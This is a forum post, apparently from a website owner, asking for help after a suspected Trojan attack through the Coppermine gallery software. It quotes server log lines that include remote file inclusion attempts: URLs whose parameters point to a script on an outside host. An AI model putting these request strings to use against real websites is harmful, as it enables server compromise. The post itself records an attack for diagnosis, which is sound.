Hello to all,
Our home page became the victim of an Trojan Attack.
A Friend has looked at the log file and he thinks that the
attack was executed via Coppermine.
I would like to ask for help therefore here.
Has another user these problem already, too?
How can I take remedial action?
Following a couple of lines from the log file
80.190.202.154 - - [25/Mar/2008:22:37:23 +0100] "GET /coppermine/e107_plugins/my_gallery/dload.php?file=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 619
www.xxxxxx-xxxxxxx.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
66.7.192.123 - - [26/Mar/2008:01:07:19 +0100] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 619
www.xxxxxx-xxxxxxx.de "-"
84.164.252.115 - - [07/Apr/2008:22:42:09 +0200] "GET /coppermine/scripts.js HTTP/1.1" 200 6578
www.xxxxxx-xxxxxxx.xx "
http://www.xxxxxx-xxxxxxx.de/coppermine/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"
84.164.252.115 - - [07/Apr/2008:22:42:10 +0200] "GET /Gallery/Saved/avuzuf/check.js HTTP/1.1" 403 623
www.xxxxxx-xxxxxxx.de "
http://www.xxxxxx-xxxxxxx.de/coppermine/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"
84.164.252.115
Tanks for attention